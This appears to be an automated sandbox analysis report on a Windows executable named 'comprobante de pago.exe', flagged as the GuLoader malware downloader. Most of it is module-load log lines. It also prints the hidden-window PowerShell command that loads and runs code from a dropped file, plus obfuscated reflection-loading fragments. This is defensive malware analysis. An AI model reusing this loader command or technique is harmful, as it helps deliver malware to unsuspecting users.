Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\comprobante de pago.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: ncryptsslp.dll	Jump to behavior

Source: C:\Users\user\Desktop\comprobante de pago.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\comprobante de pago.exe

File written: C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Bddelkses\Haandevendinger.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: comprobante de pago.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb& source: powershell.exe, 00000002.00000002.1512154751.00000000076C8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb\|{ source: powershell.exe, 00000002.00000002.1512154751.000000000769F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.1512154751.000000000769F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: .pdbof source: powershell.exe, 00000002.00000002.1516479099.0000000008822000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 00000002.00000002.1517575876.000000000AB40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2073983602.00000000044E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.880916593.00000000028C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1510713122.0000000006133000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1515536979.0000000008560000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Besvrliggjort.Van133, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\nskE3BF.tmp, type: DROPPED

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((anniversalily $Regulatress $Taljeringens), (Niddingerne @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Partikammerats = [AppDomain]::CurrentDomain.GetAsse
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($genindlggelsen)), $Cabezone).DefineDynamicModule($Materialevandringers, $false).DefineType($Derouterne, $Udstoppede, [System.Multicast

Suspicious powershell command line found

Source: C:\Users\user\Desktop\comprobante de pago.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)"
Source: C:\Users\user\Desktop\comprobante de pago.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Telemeters=GC -raw 'C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Skyldsflelsers.Pos';$Gonophorous=$Telemeters.SubString(53202,3);.$Gonophorous($Telemeters)"			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 2_2_030BE9F9 push eax; mov dword ptr [esp], edx

2_2_030BEA0C

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\gypsoplast\witherdeed\Glossologies\comprobante de pago.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\comprobante de pago.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
